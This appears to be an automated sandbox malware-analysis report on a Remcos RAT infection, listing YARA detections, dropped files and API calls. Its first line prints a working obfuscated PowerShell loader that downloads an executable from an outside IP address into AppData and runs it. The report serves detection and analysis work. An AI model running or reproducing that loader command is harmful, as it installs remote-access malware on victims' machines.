                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"Jump to behavior
                Malicious sample detected (through community Yara rule)
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Powershell drops PE file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,6_2_0041ACC1
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,6_2_0041ACED
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,6_2_0079CD05
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079AF54 OpenProcess,NtResumeProcess,CloseHandle,6_2_0079AF54
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079AF28 OpenProcess,NtSuspendProcess,CloseHandle,6_2_0079AF28
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,6_2_004158B9
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00795B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,6_2_00795B1C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041D0716_2_0041D071
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004520D26_2_004520D2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043D0986_2_0043D098
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004371506_2_00437150
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004361AA6_2_004361AA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004262546_2_00426254
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004313776_2_00431377
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043651C6_2_0043651C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041E5DF6_2_0041E5DF
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0044C7396_2_0044C739
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004367C66_2_004367C6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004267CB6_2_004267CB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043C9DD6_2_0043C9DD
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00432A496_2_00432A49
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00436A8D6_2_00436A8D
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043CC0C6_2_0043CC0C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00436D486_2_00436D48
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00434D226_2_00434D22
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00426E736_2_00426E73
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00440E206_2_00440E20
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0043CE3B6_2_0043CE3B
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00412F456_2_00412F45
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00452F006_2_00452F00
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00426FAD6_2_00426FAD
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007A70DA6_2_007A70DA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007BD0A26_2_007BD0A2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007C10876_2_007C1087
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007A72146_2_007A7214
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007BD2FF6_2_007BD2FF
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079D2D86_2_0079D2D8
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007D23396_2_007D2339
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007B73B76_2_007B73B7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007B64116_2_007B6411
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007A64BB6_2_007A64BB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0079E8466_2_0079E846
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007A6A326_2_007A6A32
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007BCC446_2_007BCC44
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007B2CB06_2_007B2CB0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007BCE736_2_007BCE73
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: String function: 004020E7 appears 41 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: String function: 007B4217 appears 46 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: String function: 0078234E appears 37 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: String function: 007B3B0C appears 41 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: String function: 004338A5 appears 41 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: String function: 00433FB0 appears 55 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: ecome[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: nicetomeetyousweeet.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/78@0/2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_2_00416AB7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00796D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_2_00796D1E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,6_2_0040E219
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,6_2_0041A63F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_00419BC4
